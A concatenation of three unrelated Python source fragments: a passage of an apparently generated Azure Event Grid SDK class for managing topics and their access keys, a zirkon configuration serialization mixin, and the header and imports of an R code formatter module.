:type topic_info: ~azure.mgmt.eventgrid.models.Topic
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either Topic or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.eventgrid.models.Topic]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Topic"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._create_or_update_initial(
resource_group_name=resource_group_name,
topic_name=topic_name,
topic_info=topic_info,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('Topic', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}'} # type: ignore
def _delete_initial(
self,
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> None
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
topic_name=topic_name,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}'} # type: ignore
@distributed_trace
def begin_delete(
self,
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller[None]
"""Delete a topic.
Delete existing topic.
:param resource_group_name: The name of the resource group within the user's subscription.
:type resource_group_name: str
:param topic_name: Name of the topic.
:type topic_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
topic_name=topic_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}'} # type: ignore
def _update_initial(
self,
resource_group_name, # type: str
topic_name, # type: str
topic_update_parameters, # type: "_models.TopicUpdateParameters"
**kwargs # type: Any
):
# type: (...) -> Optional["_models.Topic"]
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.Topic"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(topic_update_parameters, 'TopicUpdateParameters')
request = build_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
topic_name=topic_name,
content_type=content_type,
json=_json,
template_url=self._update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 201:
deserialized = self._deserialize('Topic', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}'} # type: ignore
@distributed_trace
def begin_update(
self,
resource_group_name, # type: str
topic_name, # type: str
topic_update_parameters, # type: "_models.TopicUpdateParameters"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.Topic"]
"""Update a topic.
Asynchronously updates a topic with the specified parameters.
:param resource_group_name: The name of the resource group within the user's subscription.
:type resource_group_name: str
:param topic_name: Name of the topic.
:type topic_name: str
:param topic_update_parameters: Topic update information.
:type topic_update_parameters: ~azure.mgmt.eventgrid.models.TopicUpdateParameters
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either Topic or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.eventgrid.models.Topic]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.Topic"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._update_initial(
resource_group_name=resource_group_name,
topic_name=topic_name,
topic_update_parameters=topic_update_parameters,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('Topic', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}'} # type: ignore
@distributed_trace
def list_by_subscription(
self,
filter=None, # type: Optional[str]
top=None, # type: Optional[int]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.TopicsListResult"]
"""List topics under an Azure subscription.
List all the topics under an Azure subscription.
:param filter: The query used to filter the search results using OData syntax. Filtering is
permitted on the 'name' property only and with limited number of OData operations. These
operations are: the 'contains' function as well as the following logical operations: not, and,
or, eq (for equal), and ne (for not equal). No arithmetic operations are supported. The
following is a valid filter example: $filter=contains(namE, 'PATTERN') and name ne 'PATTERN-1'.
The following is not a valid filter example: $filter=location eq 'westus'.
:type filter: str
:param top: The number of results to return per page for the list operation. Valid range for
top parameter is 1 to 100. If not specified, the default number of results to be returned is 20
items per page.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either TopicsListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.eventgrid.models.TopicsListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TopicsListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_subscription_request(
subscription_id=self._config.subscription_id,
filter=filter,
top=top,
template_url=self.list_by_subscription.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_subscription_request(
subscription_id=self._config.subscription_id,
filter=filter,
top=top,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("TopicsListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.EventGrid/topics'} # type: ignore
@distributed_trace
def list_by_resource_group(
self,
resource_group_name, # type: str
filter=None, # type: Optional[str]
top=None, # type: Optional[int]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.TopicsListResult"]
"""List topics under a resource group.
List all the topics under a resource group.
:param resource_group_name: The name of the resource group within the user's subscription.
:type resource_group_name: str
:param filter: The query used to filter the search results using OData syntax. Filtering is
permitted on the 'name' property only and with limited number of OData operations. These
operations are: the 'contains' function as well as the following logical operations: not, and,
or, eq (for equal), and ne (for not equal). No arithmetic operations are supported. The
following is a valid filter example: $filter=contains(namE, 'PATTERN') and name ne 'PATTERN-1'.
The following is not a valid filter example: $filter=location eq 'westus'.
:type filter: str
:param top: The number of results to return per page for the list operation. Valid range for
top parameter is 1 to 100. If not specified, the default number of results to be returned is 20
items per page.
:type top: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either TopicsListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.eventgrid.models.TopicsListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TopicsListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
filter=filter,
top=top,
template_url=self.list_by_resource_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_resource_group_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
filter=filter,
top=top,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("TopicsListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics'} # type: ignore
@distributed_trace
def list_shared_access_keys(
self,
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.TopicSharedAccessKeys"
"""List keys for a topic.
List the two keys used to publish to a topic.
:param resource_group_name: The name of the resource group within the user's subscription.
:type resource_group_name: str
:param topic_name: Name of the topic.
:type topic_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: TopicSharedAccessKeys, or the result of cls(response)
:rtype: ~azure.mgmt.eventgrid.models.TopicSharedAccessKeys
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.TopicSharedAccessKeys"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_list_shared_access_keys_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
topic_name=topic_name,
template_url=self.list_shared_access_keys.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('TopicSharedAccessKeys', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list_shared_access_keys.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}/listKeys'} # type: ignore
def _regenerate_key_initial(
self,
resource_group_name, # type: str
topic_name, # type: str
regenerate_key_request, # type: "_models.TopicRegenerateKeyRequest"
**kwargs # type: Any
):
# type: (...) -> "_models.TopicSharedAccessKeys"
cls = kwargs.pop('cls', None) # type: ClsType["_models.TopicSharedAccessKeys"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(regenerate_key_request, 'TopicRegenerateKeyRequest')
request = build_regenerate_key_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
topic_name=topic_name,
content_type=content_type,
json=_json,
template_url=self._regenerate_key_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('TopicSharedAccessKeys', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_regenerate_key_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}/regenerateKey'} # type: ignore
@distributed_trace
def begin_regenerate_key(
self,
resource_group_name, # type: str
topic_name, # type: str
regenerate_key_request, # type: "_models.TopicRegenerateKeyRequest"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.TopicSharedAccessKeys"]
"""Regenerate key for a topic.
Regenerate a shared access key for a topic.
:param resource_group_name: The name of the resource group within the user's subscription.
:type resource_group_name: str
:param topic_name: Name of the topic.
:type topic_name: str
:param regenerate_key_request: Request body to regenerate key.
:type regenerate_key_request: ~azure.mgmt.eventgrid.models.TopicRegenerateKeyRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either TopicSharedAccessKeys or the result of
cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.eventgrid.models.TopicSharedAccessKeys]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.TopicSharedAccessKeys"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._regenerate_key_initial(
resource_group_name=resource_group_name,
topic_name=topic_name,
regenerate_key_request=regenerate_key_request,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('TopicSharedAccessKeys', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_regenerate_key.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}/regenerateKey'} # type: ignore
@distributed_trace
def list_event_types(
self,
resource_group_name, # type: str
provider_namespace, # type: str
resource_type_name, # type: str
resource_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.EventTypesListResult"]
"""List topic event types.
List event types for a topic.
:param resource_group_name: The name of the resource group within the user's subscription.
:type resource_group_name: str
:param provider_namespace: Namespace of the provider of the topic.
:type provider_namespace: str
:param resource_type_name: Name of the topic type.
:type resource_type_name: str
:param resource_name: Name of the topic.
:type resource_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either EventTypesListResult or the result of
cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.eventgrid.models.EventTypesListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.EventTypesListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_event_types_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
provider_namespace=provider_namespace,
resource_type_name=resource_type_name,
resource_name=resource_name,
template_url=self.list_event_types.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_event_types_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
provider_namespace=provider_namespace,
resource_type_name=resource_type_name,
resource_name=resource_name,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("EventTypesListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_event_types.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{providerNamespace}/{resourceTypeName}/{resourceName}/providers/Microsoft.EventGrid/eventTypes'} # type: ignore
|
|
# -*- coding: utf-8 -*-
#
# Copyright 2013 Simone Campagna
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""\
Implementation of the ConfigBase mixin class, adding serialization methods.
"""
from .errors import ConfigValidationError
from .filetype import get_filetype, get_default_fmt
from .macros import MContext
from .section import Section
from .toolbox import serializer
__author__ = "Simone Campagna"
__copyright__ = 'Copyright (c) 2015 Simone Campagna'
__license__ = 'Apache License Version 2.0'
__all__ = [
'ConfigBase',
]
class ConfigBase(Section):
r""" Config base class; adds to Section serialization/deserialization methods.
Parameters
----------
init: |Mapping|, optional
some initialization content
dictionary: |Mapping|, optional
the internal dictionary
schema: |Schema|, optional
the validation schema
validate: bool, optional
self validate during initialization;
macros: bool, optional
enables macros (defaults to True);
\*\*section_options:
keyword arguments to be passed to the Section contructor
"""
def __init__(self, init=None, *, dictionary=None, schema=None, validate=True,
macros=True, **section_options):
super().__init__(dictionary=dictionary, init=init,
macros=macros, **section_options)
self._schema = None
self.set_schema(schema=schema, validate=validate)
@property
def schema(self):
"""Gets the schema attribute"""
return self._schema
@schema.setter
def schema(self, schema):
"""Sets the schema attribute"""
return self.set_schema(schema)
def set_schema(self, schema, *, validate=True):
"""Sets the validation schema
Parameters
----------
schema: |Schema|
the schema to be used for self-validation
(can be None to disable self-validation)
validate: bool
execute self-validation now (defaults to True)
Raises
------
|OptionValidationError|
option validation error
"""
self._schema = schema
if validate:
self.self_validate(raise_on_error=True)
def self_validate(self, raise_on_error=False):
"""Validate the config itself using the 'schema' attribute.
Parameters
----------
raise_on_error: bool, optional
raise an exception at the very first validation error; defaults to False;
Raises
------
|OptionValidationError|
option validation error
Returns
-------
|Validation|
the validation object containing all the found errors.
If 'raise_on_errors' is True, it contains at most one error.
"""
if self._schema is not None:
validation = self._schema.validate(self, raise_on_error=False)
if raise_on_error and validation:
raise ConfigValidationError(validation=validation)
else:
return validation
@classmethod
def get_serializer(cls, fmt):
"""Returns a serializer for the required format.
Parameters
----------
fmt: str
a valid format name
Raises
------
ValueError
unsupported serialization format
Returns
-------
zirkon.toolbox.serializer.Serializer
the serializer instance.
"""
serializer_class = serializer.Serializer.get_class(fmt)
if serializer_class is None:
raise ValueError("serialization format {} not available [{}]".format(
fmt,
'|'.join(registered_class.class_tag() for registered_class in serializer.Serializer.classes()),
))
return serializer_class(scope=cls.__scope__)
@classmethod
def _get_fmt(cls, filename, fmt=None):
"""Get the file format
Parameters
----------
filename: str
a file name
fmt: str, optional
a valid format name (defaults to None); when fmt is None,
it will be deduced from filename, if possible
Returns
-------
str
the file format
Raises
------
ValueError
if fmt is missing and it cannot be deduced
"""
if fmt is None:
filetype = get_filetype(filename, config_classes=cls)
if filetype is None:
raise ValueError("file {}: format cannot be deduced".format(filename))
fmt = filetype.fmt
return fmt
def to_string(self, fmt=None, *, defaults=False, evaluate=False):
"""Serializes to string according to 'format'.
Parameters
----------
fmt: str, optional
a valid format name (defaults to None)
defaults: bool, optional
if True, serialize also default values (defaults to False)
evaluate: bool, optional
if True evaluate macros (defaults to False)
Raises
------
|OptionValidationError|
option validation error
Returns
-------
str
the serialization string
"""
if fmt is None:
fmt = get_default_fmt()
self.self_validate(raise_on_error=True)
serializer_instance = self.get_serializer(fmt)
obj = self.as_dict(defaults=defaults, evaluate=evaluate)
return serializer_instance.to_string(obj)
def to_stream(self, stream, fmt=None, *, defaults=False, evaluate=False):
"""Serializes to file stream 'stream' according to 'format'.
Parameters
----------
stream: file
a file stream
fmt: str, optional
a valid format name (defaults to None)
defaults: bool, optional
if True, serialize also default values (defaults to False)
evaluate: bool, optional
if True evaluate macros (defaults to False)
Raises
------
|OptionValidationError|
option validation error
ValueError
if fmt is missing and it cannot be deduced from filename
"""
if fmt is None:
fmt = get_default_fmt()
self.self_validate(raise_on_error=True)
serializer_instance = self.get_serializer(fmt)
obj = self.as_dict(defaults=defaults, evaluate=evaluate)
serializer_instance.to_stream(obj, stream)
def to_file(self, filename, fmt=None, *, defaults=False, evaluate=False):
"""Serializes to file 'filename' according to 'format'.
Parameters
----------
filename: str
a file name
fmt: str, optional
a valid format name (defaults to None); when fmt is None,
it will be deduced from filename, if possible
defaults: bool, optional
if True, serialize also default values (defaults to False)
evaluate: bool, optional
if True evaluate macros (defaults to False)
Raises
------
|OptionValidationError|
option validation error
"""
fmt = self._get_fmt(filename=filename, fmt=fmt)
self.self_validate(raise_on_error=True)
serializer_instance = self.get_serializer(fmt)
obj = self.as_dict(defaults=defaults, evaluate=evaluate)
serializer_instance.to_file(obj, filename)
def dump(self, stream=None, fmt=None, *, defaults=False, evaluate=False):
if fmt is None:
fmt = get_default_fmt()
self.self_validate(raise_on_error=True)
super().dump(stream=stream, fmt=fmt, defaults=defaults, evaluate=evaluate)
@classmethod
def from_file(cls, filename, fmt=None, *,
dictionary=None, schema=None, validate=True, **config_args):
r"""Deserializes from file 'filename' according to 'format'.
Parameters
----------
filename: str
a file name
fmt: str, optional
a valid format name (defaults to None); when fmt is None,
it will be deduced from filename, if possible
dictionary: mapping, optional
the internal dictionary (defaults to None)
schema: Schema, optional
the validation schema (defaults to None)
validate: bool, optional
if True self-validate on contruction (defaults to True)
\*\*config_args
keyword arguments to be passed to the constructor
Returns
-------
cls
the deserialized object
Raises
------
ValueError
if fmt is missing and it cannot be deduced from filename
"""
fmt = cls._get_fmt(filename=filename, fmt=fmt)
serializer_instance = cls.get_serializer(fmt)
content = serializer_instance.from_file(filename)
with MContext.referring(filename):
instance = cls(init=content, dictionary=dictionary, **config_args)
instance.set_filename(filename)
instance.set_schema(schema=schema, validate=validate)
return instance
@classmethod
def from_stream(cls, stream, fmt=None, *,
dictionary=None, filename=None,
schema=None, validate=True, **config_args):
r"""Deserializes from file stream 'stream' according to 'format'.
Parameters
----------
stream: file
a file stream
fmt: str, optional
a valid format name (defaults to None)
dictionary: mapping, optional
the internal dictionary (defaults to None)
schema: Schema, optional
the validation schema (defaults to None)
validate: bool, optional
if True self-validate on contruction (defaults to True)
\*\*config_args
keyword arguments to be passed to the constructor
Returns
-------
cls
the deserialized object
"""
if fmt is None:
fmt = get_default_fmt()
serializer_instance = cls.get_serializer(fmt)
content = serializer_instance.from_stream(stream, filename=filename)
with MContext.referring(filename):
instance = cls(init=content, dictionary=dictionary, **config_args)
instance.set_filename(filename)
instance.set_schema(schema=schema, validate=validate)
return instance
@classmethod
def from_string(cls, string, fmt=None, *,
dictionary=None, filename=None, schema=None, validate=True, **config_args):
r"""Deserializes from string 'string' according to 'format'.
Parameters
----------
string: str
a serialization string
fmt: str, optional
a valid format name (defaults to None)
dictionary: mapping, optional
the internal dictionary (defaults to None)
schema: Schema, optional
the validation schema (defaults to None)
validate: bool, optional
if True self-validate on contruction (defaults to True)
\*\*config_args
keyword arguments to be passed to the constructor
Returns
-------
cls
the deserialized object
"""
if fmt is None:
fmt = get_default_fmt()
serializer_instance = cls.get_serializer(fmt)
content = serializer_instance.from_string(string, filename=filename)
with MContext.referring(filename):
instance = cls(init=content, dictionary=dictionary, **config_args)
instance.set_filename(filename)
instance.set_schema(schema=schema, validate=validate)
return instance
def read(self, filename, fmt=None, merge=False):
"""Reads from file 'filename' according to 'format'. The initial content is cleared.
Parameters
----------
filename: str
a file name
fmt: str, optional
a valid format name (defaults to None); when fmt is None,
it will be deduced from filename, if possible
merge: bool, optional
if True merge old and new content
Raises
------
|OptionValidationError|
option validation error
ValueError
if fmt is missing and it cannot be deduced
"""
fmt = self._get_fmt(filename=filename, fmt=fmt)
if not merge:
self.clear()
with MContext.referring(filename):
serializer_instance = self.get_serializer(fmt)
content = serializer_instance.from_file(filename)
self.merge(content)
self.set_filename(filename)
self.self_validate(raise_on_error=True)
def write(self, filename, fmt=None):
"""Writes to file 'filename' according to 'format'.
Parameters
----------
filename: str
a file name
fmt: str, optional
a valid format name (defaults to None); when fmt is None,
it will be deduced from filename, if possible
Raises
------
|OptionValidationError|
option validation error
ValueError
if fmt is missing and it cannot be deduced
"""
self.to_file(filename, fmt)
def copy(self):
"""Returns a deep copy of the config.
"""
instance = self.__class__(super().copy())
instance.set_filename(self._filename)
return instance
|
|
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""R-specific portions (to wit, lexer and parser) of the R formatter.
Much of the code for the R lexer is structured along the lines of the C code
in the R system implementation itself, and the PLY grammar used here is adapted
from the YACC grammar used in the R parser. For details, see:
https://svn.r-project.org/R/trunk/src/main/gram.y
"""
import collections
import cStringIO as StringIO
import os
import ply.yacc as yacc
import base
import rparsetab
